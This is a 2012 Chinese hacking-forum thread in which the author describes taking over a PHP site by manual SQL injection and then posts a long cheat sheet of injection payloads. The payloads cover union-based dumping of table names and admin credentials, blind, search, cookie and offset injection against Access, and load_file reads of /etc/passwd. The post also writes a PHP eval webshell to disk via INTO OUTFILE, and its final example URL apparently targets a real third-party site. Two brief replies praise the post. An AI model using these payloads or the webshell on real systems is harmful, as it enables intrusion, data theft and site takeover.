找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2916|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
6 d) o( E6 F7 M9 e% \3 v让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
) U; p* |/ ?2 `& D4 |' p我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
3 M" T+ X3 M# J! I8 Q5 l! r# }. r1 z如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
3 [/ K' e( H* W- `* y( ^+ n, k1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,): r$ v1 ?, q" M) y' f
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:* i' Q, B& G& R2 a6 s# T9 w* [8 Z
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in' i0 Z7 {! i+ I- v; G
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入1 ~6 n% ?. @8 t' X* k# A
                         % K+ ^, H5 \2 [  k- z6 W8 U; k
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
# \. k. h$ s; \5 [* w" ?, O3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
, b% k* _0 T) b4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息  w; z' u0 q5 h
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。# V* A/ k4 F  N" T% N
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,( Q5 X+ ?( \: _% b1 _" h6 i
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。0 C! I) D' f$ P, d& V# {3 `- R6 q
我就用的是第二个思路,4 l3 q. y/ c9 ]- M* H$ @$ ], P! X
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
) ?; e8 v- z4 C6 v' b; T: S+ f1 F6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
, q. y) M$ B+ t+ v/ t& t2 r5 y提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--" Z* S3 l$ E+ L; `. l( }
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。  G' Y7 ^7 d$ j8 N/ Z
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
- ~0 i) _& U( k是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
) D8 p* i: k! N, U提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --5 \0 ~5 z# |- {# y* e! w
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,6 Q4 C- h5 p( K* \  O! _$ ~
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......: _1 p$ ^7 z- ^0 m$ I/ G# ]  O
下面是一些很普遍注入方式资料:
* }: ^% y0 |/ C1 J! T) d8 c注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
+ A7 n9 S: Q2 \2 }; p* N8 j% ?拆半法
6 p1 p; U4 c* k######################################
# w2 ?3 Z! @5 Z- U$ l1 tand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。4 c& g- Z/ d+ G
and exists (select * from admin)2 M1 G6 w  i: t% h8 ], C( `
and exists(select id from admin)
' H/ B1 p4 |  l( Uand exists(select id from admin where id=1)
7 f) [' I& E5 V! g' I" _and exists(select id from admin where id>1)
2 S3 E; k" D4 }然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
$ N3 l# Q7 f9 n6 \7 M. V3 ]- rand exists (select username from admin)
6 L0 P9 d) c' r+ h0 x' g! band exists (select password from admin)  v+ d) a5 m' b) u
and exists (select id from admin where len(username)<10 and id=1)
8 \% i; r# b+ Gand exists (select id from admin where len(username)>5 and id=1); u) w$ S) n- {5 t' O
and exists (select id from admin where len(username)=6 and id=1)/ `0 l, L! L: I  w0 M6 f
and exists (select id from admin where len(password)<10 and id=1)
" \* w9 ^) j; R- |. H5 W) ?and exists (select id from admin where len(password)>5 and id=1); W! D; k/ ~7 X. x. f* N: c7 q
and exists (select id from admin where len(password)=7 and id=1)
9 e# E( \/ Q- n1 Y1 _$ Aand (select top 1 asc(mid(username,1,1)) from admin)=97, G) F) F- o$ y
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
/ @0 V4 ?9 r( L* w( F" z8 z猜第二位把username,1,1改成username,2,1就可以了。; U6 b& K* k; i3 Q8 V; h8 K
猜密码把username改成password就OK了, ?/ E+ T8 H5 \1 b" _
##################################################* _/ g( I" [. P+ e: t0 ^' e  _2 `
搜索型注入
. F* X* Y$ N$ e8 W+ ]##################################- ?" {4 k  e# Y2 o& `7 J
%' and 1=1 and '%'='7 T  d7 z. P% g) o
%' and exists (select * from admin) and '%'='% q" I' P' }; R
%' and exists(select id from admin where id=1) and '%'='9 \# z7 X! \- V. u
%' and exists (select id from admin where len(username)<10 and id=1) and '%'=') ^; @% l6 |, g5 f7 x0 f
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='" H* n7 X# m2 F& L) r$ T
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='; g" t5 c4 H2 A3 C# D
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='$ T/ f" w; A/ m+ D5 e8 M
对于MSSQL数据库,后面可以吧 and '%'='换成--- [* G$ \& {3 f; \1 U  L8 P
还有一点搜索型注入也可以使用union语句。3 ]% q' l8 g. ?1 `1 U) ~' x% Q
########################################################
+ M! S: o- G7 v0 j联合查询。
. }' V4 \; v/ Z& [- M0 n#####################################/ x. r  E& t+ r
order by 10$ ~8 A9 w0 U9 m3 {
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
* T! r0 {0 n/ w2 P7 T: vand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
8 u; K/ u" I1 ?/ `% hand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
, m2 h* {4 Y, R* b很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
: F) S" j0 L5 X# {###################################2 |: W* P" w; {. a7 m
cookie注入% R3 p: \  \5 q/ P7 \' b  W) U% Q
###############################, n: b8 F0 U; {0 ^/ o
http://www.******.com/shownews.asp?id=127+ X( R- q/ \) K, a1 l& U
http://www.******.com/shownews.asp/ q5 d, d8 e8 w+ r: a
alert(="id="+escape("127"));) s- @" n+ h- Q1 ]- w9 A! w
alert(="id="+escape("127 and 1=1"));
; a# O7 Z. x, d$ malert(="id="+escape("127 order by 10"));
/ H" T' m1 S9 d2 A, Q9 Y* u& Salert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
6 F1 B% M: v# Z. I! O* Kalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
' w+ x" i, r4 S. d这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。1 M" u/ _& M. V
###################################
! Z: r7 [5 X/ W6 x  C偏移注入% x' _' A# \# u" {' G  r
###########################################################. u) F! I9 W# [& F
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
) e" q/ S( B0 m; D# P& T# }  j* xunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
- |" f- V9 f/ b. D" Vunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
+ s- U1 `& g$ w- j9 c5 i4 `union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)8 ]. ?2 |3 h6 m" S* B0 }
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
% m: }: C; u) @/ Ounion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id). S+ h" K5 Z' M5 {, h) i2 G) f
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on& ~( ?5 t% N6 w0 ?& K* a
a.id=d.id)
  S& Z5 O. E* X7 L2 c9 [& ?  Fand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
) S( D6 X: j7 X3 m, _6 hand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 6 o6 C9 W- u' l/ z( i. C6 V& _5 J' x. P& n) u
  & L# q5 f0 D' j) Q9 f
============================================================================================================' C- Z' _% I& _6 D) g& o9 N
1.判断版本
% J# M; k" I0 {( ?and ord(mid(version(),1,1))>51/ E1 N+ _1 ~2 h9 S
返回正常,说明大于4.0版本,支持ounion查询. w: U" z- S. [' u1 c
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
  I  }7 V3 E& U' u# @$ Band 2=4 union select 1,2,3,4,5,6,7,8,9--! Q9 a! u0 s' Z( J2 Q1 h
3.查看数据库版本及当前用户,3 ]7 e7 y- u7 g4 v8 Q% C( H
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--+ r9 N9 ?$ v7 U! v4 d) |+ q! k8 W
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
4 ?5 `5 X( r/ w- w+ P4 O3 U* {4.判断有没有写权限
* L- Y" V3 o+ t( S! Q8 pand (select count(*) from MySQL.user)>0-- 5 j  T' b7 j* {# A
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1* U0 s; V- U& z# G
用不了这个命令,就学习土耳其黑客手法,如下" y! P. S0 D9 H: Q/ m0 Z' K
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--7 Y$ M  Z3 B7 j) m4 E& y* z9 ]( s
6.爆表,爆库, v; Z. @' f' S8 R' b$ P" \2 x
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--- t3 t# o; k8 t# B
7.爆列名,爆表
4 Q. k8 D6 y. u7 jand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--. J% m$ G  v8 M0 C
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。' G, k' o8 ]& H' x; n% T
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
5 ?/ v- Q. Q+ h6 i; E( L2 h+ |' ]9.爆字段内容
! q4 y( H3 r% Z, F& Vand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--7 |% L& y0 A% I4 f8 [8 D
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表